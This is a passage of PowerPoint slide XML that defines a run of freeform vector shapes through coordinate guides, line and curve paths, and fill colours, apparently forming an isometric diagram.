                  <a:gd name="T6" fmla="*/ 284 w 317"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 317 w 317"/>
                  <a:gd name="T9" fmla="*/ 78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7" h="85">
                    <a:moveTo>
                      <a:pt x="317" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="78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6" name="Freeform 557"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6991" y="-3672"/>
                <a:ext cx="284" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 284 w 284"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 284 w 284"/>
                  <a:gd name="T3" fmla="*/ 76 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 284"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 284"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 284 w 284"/>
                  <a:gd name="T9" fmla="*/ 359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4" h="359">
                    <a:moveTo>
                      <a:pt x="284" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="284" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="359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7" name="Freeform 558"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7275" y="-3603"/>
                <a:ext cx="33" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 33 w 33"/>
                  <a:gd name="T3" fmla="*/ 281 h 290"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 7 h 290"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7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8" name="Freeform 559"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="-2961"/>
                <a:ext cx="4073" cy="1559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4073"/>
                  <a:gd name="T1" fmla="*/ 0 h 1559"/>
                  <a:gd name="T2" fmla="*/ 0 w 4073"/>
                  <a:gd name="T3" fmla="*/ 468 h 1559"/>
                  <a:gd name="T4" fmla="*/ 4073 w 4073"/>
                  <a:gd name="T5" fmla="*/ 1559 h 1559"/>
                  <a:gd name="T6" fmla="*/ 4073 w 4073"/>
                  <a:gd name="T7" fmla="*/ 1092 h 1559"/>
                  <a:gd name="T8" fmla="*/ 0 w 4073"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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73" h="1559">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4073" y="1559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4073" y="10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9" name="Freeform 560"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7556" y="-1990"/>
                <a:ext cx="453" cy="588"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 588 h 588"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 121 h 588"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 588"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 468 h 588"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9" fmla="*/ 58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3" h="588">
                    <a:moveTo>
                      <a:pt x="0" y="588"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="588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0" name="Freeform 561"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9682" y="-2143"/>
                <a:ext cx="2239" cy="1070"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 1070 h 1070"/>
                  <a:gd name="T2" fmla="*/ 0 w 2239"/>
                  <a:gd name="T3" fmla="*/ 600 h 1070"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 0 h 1070"/>
                  <a:gd name="T6" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T7" fmla="*/ 467 h 1070"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 1070 h 10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39" h="1070">
                    <a:moveTo>
                      <a:pt x="0" y="1070"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1070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1" name="Freeform 562"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8009" y="-1990"/>
                <a:ext cx="1673" cy="917"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1673"/>
                  <a:gd name="T1" fmla="*/ 0 h 917"/>
                  <a:gd name="T2" fmla="*/ 0 w 1673"/>
                  <a:gd name="T3" fmla="*/ 468 h 917"/>
                  <a:gd name="T4" fmla="*/ 1673 w 1673"/>
                  <a:gd name="T5" fmla="*/ 917 h 917"/>
                  <a:gd name="T6" fmla="*/ 1673 w 1673"/>
                  <a:gd name="T7" fmla="*/ 447 h 917"/>
                  <a:gd name="T8" fmla="*/ 0 w 1673"/>
                  <a:gd name="T9" fmla="*/ 0 h 9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73" h="917">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1673" y="917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1673" y="4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2" name="Freeform 563"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3609" y="-4036"/>
                <a:ext cx="744" cy="2613"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 744 w 744"/>
                  <a:gd name="T1" fmla="*/ 2613 h 2613"/>
                  <a:gd name="T2" fmla="*/ 744 w 744"/>
                  <a:gd name="T3" fmla="*/ 199 h 2613"/>
                  <a:gd name="T4" fmla="*/ 0 w 744"/>
                  <a:gd name="T5" fmla="*/ 0 h 2613"/>
                  <a:gd name="T6" fmla="*/ 0 w 744"/>
                  <a:gd name="T7" fmla="*/ 2412 h 2613"/>
                  <a:gd name="T8" fmla="*/ 744 w 744"/>
                  <a:gd name="T9" fmla="*/ 2613 h 2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44" h="2613">
                    <a:moveTo>
                      <a:pt x="744" y="2613"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="744" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="2613"/>
                    </a:lnTo>
                    <a:close/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3" name="Freeform 564"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6531" y="-3265"/>
                <a:ext cx="744" cy="2615"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 744 w 744"/>
                  <a:gd name="T1" fmla="*/ 2615 h 2615"/>
                  <a:gd name="T2" fmla="*/ 744 w 744"/>
                  <a:gd name="T3" fmla="*/ 200 h 2615"/>
                  <a:gd name="T4" fmla="*/ 0 w 744"/>
                  <a:gd name="T5" fmla="*/ 0 h 2615"/>
                  <a:gd name="T6" fmla="*/ 0 w 744"/>
                  <a:gd name="T7" fmla="*/ 2414 h 2615"/>
                  <a:gd name="T8" fmla="*/ 744 w 744"/>
                  <a:gd name="T9" fmla="*/ 2615 h 2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44" h="2615">
                    <a:moveTo>
                      <a:pt x="744" y="2615"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="744" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="2615"/>
                    </a:lnTo>
                    <a:close/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4" name="Line 565"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3982" y="-3939"/>
                <a:ext cx="0" cy="241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5" name="Freeform 566"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3840" y="-2562"/>
                <a:ext cx="106" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 106 w 106"/>
                  <a:gd name="T1" fmla="*/ 26 h 29"/>
                  <a:gd name="T2" fmla="*/ 10 w 106"/>
                  <a:gd name="T3" fmla="*/ 0 h 29"/>
                  <a:gd name="T4" fmla="*/ 0 w 106"/>
                  <a:gd name="T5" fmla="*/ 5 h 29"/>
                  <a:gd name="T6" fmla="*/ 95 w 106"/>
                  <a:gd name="T7" fmla="*/ 29 h 29"/>
                  <a:gd name="T8" fmla="*/ 106 w 106"/>
                  <a:gd name="T9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29">
                    <a:moveTo>
                      <a:pt x="106" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="2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6" name="Freeform 567"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3840" y="-2557"/>
                <a:ext cx="95" cy="118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 95"/>
                  <a:gd name="T1" fmla="*/ 118 h 118"/>
                  <a:gd name="T2" fmla="*/ 95 w 95"/>
                  <a:gd name="T3" fmla="*/ 24 h 118"/>
                  <a:gd name="T4" fmla="*/ 0 w 95"/>
                  <a:gd name="T5" fmla="*/ 0 h 118"/>
                  <a:gd name="T6" fmla="*/ 0 w 95"/>
                  <a:gd name="T7" fmla="*/ 95 h 118"/>
                  <a:gd name="T8" fmla="*/ 95 w 95"/>
                  <a:gd name="T9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118">
                    <a:moveTo>
                      <a:pt x="95" y="118"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="95" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="11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7" name="Freeform 568"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3935" y="-2536"/>
                <a:ext cx="11" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 11"/>
                  <a:gd name="T1" fmla="*/ 0 h 97"/>
                  <a:gd name="T2" fmla="*/ 11 w 11"/>
                  <a:gd name="T3" fmla="*/ 95 h 97"/>
                  <a:gd name="T4" fmla="*/ 0 w 11"/>
                  <a:gd name="T5" fmla="*/ 97 h 97"/>
                  <a:gd name="T6" fmla="*/ 0 w 11"/>
                  <a:gd name="T7" fmla="*/ 3 h 97"/>
                  <a:gd name="T8" fmla="*/ 11 w 11"/>
                  <a:gd name="T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7">
                    <a:moveTo>
                      <a:pt x="11" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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8" name="Freeform 569"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4017" y="-2514"/>
                <a:ext cx="109" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 109 w 109"/>
                  <a:gd name="T1" fmla="*/ 26 h 28"/>
                  <a:gd name="T2" fmla="*/ 12 w 109"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 109"/>
                  <a:gd name="T5" fmla="*/ 2 h 28"/>
                  <a:gd name="T6" fmla="*/ 97 w 109"/>
                  <a:gd name="T7" fmla="*/ 28 h 28"/>
                  <a:gd name="T8" fmla="*/ 109 w 109"/>
                  <a:gd name="T9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9" h="28">
                    <a:moveTo>
                      <a:pt x="109" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2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9" name="Freeform 570"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4017" y="-2512"/>
                <a:ext cx="97" cy="121"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 97 w 97"/>
                  <a:gd name="T1" fmla="*/ 121 h 121"/>
                  <a:gd name="T2" fmla="*/ 97 w 97"/>
                  <a:gd name="T3" fmla="*/ 26 h 121"/>
                  <a:gd name="T4" fmla="*/ 0 w 97"/>
                  <a:gd name="T5" fmla="*/ 0 h 121"/>
                  <a:gd name="T6" fmla="*/ 0 w 97"/>
                  <a:gd name="T7" fmla="*/ 95 h 121"/>
                  <a:gd name="T8" fmla="*/ 97 w 97"/>
                  <a:gd name="T9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121">
                    <a:moveTo>
                      <a:pt x="97" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="121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0" name="Freeform 571"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4114" y="-2488"/>
                <a:ext cx="12" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 12"/>
                  <a:gd name="T1" fmla="*/ 0 h 97"/>
                  <a:gd name="T2" fmla="*/ 12 w 12"/>
                  <a:gd name="T3" fmla="*/ 94 h 97"/>
                  <a:gd name="T4" fmla="*/ 0 w 12"/>
                  <a:gd name="T5" fmla="*/ 97 h 97"/>
                  <a:gd name="T6" fmla="*/ 0 w 12"/>
                  <a:gd name="T7" fmla="*/ 2 h 97"/>
                  <a:gd name="T8" fmla="*/ 12 w 12"/>
                  <a:gd name="T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7">
                    <a:moveTo>
                      <a:pt x="12" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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1" name="Freeform 572"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9287" y="-936"/>
                <a:ext cx="2634" cy="798"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 1115"/>
                  <a:gd name="T1" fmla="*/ 299 h 338"/>
                  <a:gd name="T2" fmla="*/ 167 w 1115"/>
                  <a:gd name="T3" fmla="*/ 338 h 338"/>
                  <a:gd name="T4" fmla="*/ 1115 w 1115"/>
                  <a:gd name="T5" fmla="*/ 84 h 338"/>
                  <a:gd name="T6" fmla="*/ 1115 w 1115"/>
                  <a:gd name="T7" fmla="*/ 0 h 338"/>
                  <a:gd name="T8" fmla="*/ 167 w 1115"/>
                  <a:gd name="T9" fmla="*/ 255 h 338"/>
                  <a:gd name="T10" fmla="*/ 0 w 1115"/>
                  <a:gd name="T11" fmla="*/ 210 h 338"/>
                  <a:gd name="T12" fmla="*/ 20 w 1115"/>
                  <a:gd name="T13" fmla="*/ 299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15" h="338">
                    <a:moveTo>
                      <a:pt x="20" y="299"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="338"/>
                      <a:pt x="167" y="338"/>
                      <a:pt x="167" y="338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1115" y="84"/>
                      <a:pt x="1115" y="84"/>
                      <a:pt x="1115" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1115" y="0"/>
                      <a:pt x="1115" y="0"/>
                      <a:pt x="1115" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="255"/>
                      <a:pt x="167" y="255"/>
                      <a:pt x="167" y="255"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="210"/>
                      <a:pt x="0" y="210"/>
                      <a:pt x="0" y="210"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="210"/>
                      <a:pt x="16" y="271"/>
                      <a:pt x="20" y="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2" name="Freeform 573"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9739" y="-1425"/>
                <a:ext cx="356" cy="463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 356"/>
                  <a:gd name="T1" fmla="*/ 463 h 463"/>
                  <a:gd name="T2" fmla="*/ 0 w 356"/>
                  <a:gd name="T3" fmla="*/ 94 h 463"/>
                  <a:gd name="T4" fmla="*/ 356 w 356"/>
                  <a:gd name="T5" fmla="*/ 0 h 463"/>
                  <a:gd name="T6" fmla="*/ 356 w 356"/>
                  <a:gd name="T7" fmla="*/ 368 h 463"/>
                  <a:gd name="T8" fmla="*/ 0 w 356"/>
                  <a:gd name="T9" fmla="*/ 463 h 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6" h="463">
                    <a:moveTo>
                      <a:pt x="0" y="463"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="463"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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3" name="Freeform 574"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="11513" y="-1902"/>
                <a:ext cx="356" cy="463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 356"/>
                  <a:gd name="T1" fmla="*/ 463 h 463"/>
                  <a:gd name="T2" fmla="*/ 0 w 356"/>
                  <a:gd name="T3" fmla="*/ 94 h 463"/>
                  <a:gd name="T4" fmla="*/ 356 w 356"/>
                  <a:gd name="T5" fmla="*/ 0 h 463"/>
                  <a:gd name="T6" fmla="*/ 356 w 356"/>
                  <a:gd name="T7" fmla="*/ 368 h 463"/>
                  <a:gd name="T8" fmla="*/ 0 w 356"/>
                  <a:gd name="T9" fmla="*/ 463 h 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6" h="463">
                    <a:moveTo>
                      <a:pt x="0" y="463"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="463"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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4" name="Freeform 575"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9739" y="-861"/>
                <a:ext cx="300" cy="227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 300"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 0 w 300"/>
                  <a:gd name="T3" fmla="*/ 81 h 227"/>
                  <a:gd name="T4" fmla="*/ 300 w 300"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 300 w 300"/>
                  <a:gd name="T7" fmla="*/ 147 h 227"/>
                  <a:gd name="T8" fmla="*/ 0 w 300"/>
                  <a:gd name="T9" fmla="*/ 22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0" h="227">
                    <a:moveTo>
                      <a:pt x="0" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="147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F294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5" name="Freeform 576"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="11569" y="-1352"/>
                <a:ext cx="300" cy="227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 300"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 0 w 300"/>
                  <a:gd name="T3" fmla="*/ 80 h 227"/>
                  <a:gd name="T4" fmla="*/ 300 w 300"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 300 w 300"/>
                  <a:gd name="T7" fmla="*/ 146 h 227"/>
                  <a:gd name="T8" fmla="*/ 0 w 300"/>
                  <a:gd name="T9" fmla="*/ 22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0" h="227">
                    <a:moveTo>
                      <a:pt x="0" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="146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F294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6" name="Freeform 577"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10379" y="-1435"/>
                <a:ext cx="881" cy="383"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 881"/>
                  <a:gd name="T1" fmla="*/ 383 h 383"/>
                  <a:gd name="T2" fmla="*/ 0 w 881"/>
                  <a:gd name="T3" fmla="*/ 237 h 383"/>
                  <a:gd name="T4" fmla="*/ 881 w 881"/>
                  <a:gd name="T5" fmla="*/ 0 h 383"/>
                  <a:gd name="T6" fmla="*/ 881 w 881"/>
                  <a:gd name="T7" fmla="*/ 147 h 383"/>
                  <a:gd name="T8" fmla="*/ 0 w 881"/>
                  <a:gd name="T9" fmla="*/ 383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1" h="383">
                    <a:moveTo>
                      <a:pt x="0" y="383"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383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7" name="Freeform 578"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10379" y="-1260"/>
                <a:ext cx="881" cy="383"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 881"/>
                  <a:gd name="T1" fmla="*/ 383 h 383"/>
                  <a:gd name="T2" fmla="*/ 0 w 881"/>
                  <a:gd name="T3" fmla="*/ 236 h 383"/>
                  <a:gd name="T4" fmla="*/ 881 w 881"/>
                  <a:gd name="T5" fmla="*/ 0 h 383"/>
                  <a:gd name="T6" fmla="*/ 881 w 881"/>
                  <a:gd name="T7" fmla="*/ 147 h 383"/>
                  <a:gd name="T8" fmla="*/ 0 w 881"/>
                  <a:gd name="T9" fmla="*/ 383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1" h="383">
                    <a:moveTo>
                      <a:pt x="0" y="383"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383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8" name="Freeform 579"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10379" y="-1078"/>
                <a:ext cx="881" cy="383"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 881"/>
                  <a:gd name="T1" fmla="*/ 383 h 383"/>
                  <a:gd name="T2" fmla="*/ 0 w 881"/>
                  <a:gd name="T3" fmla="*/ 236 h 383"/>
                  <a:gd name="T4" fmla="*/ 881 w 881"/>
                  <a:gd name="T5" fmla="*/ 0 h 383"/>
                  <a:gd name="T6" fmla="*/ 881 w 881"/>
                  <a:gd name="T7" fmla="*/ 146 h 383"/>
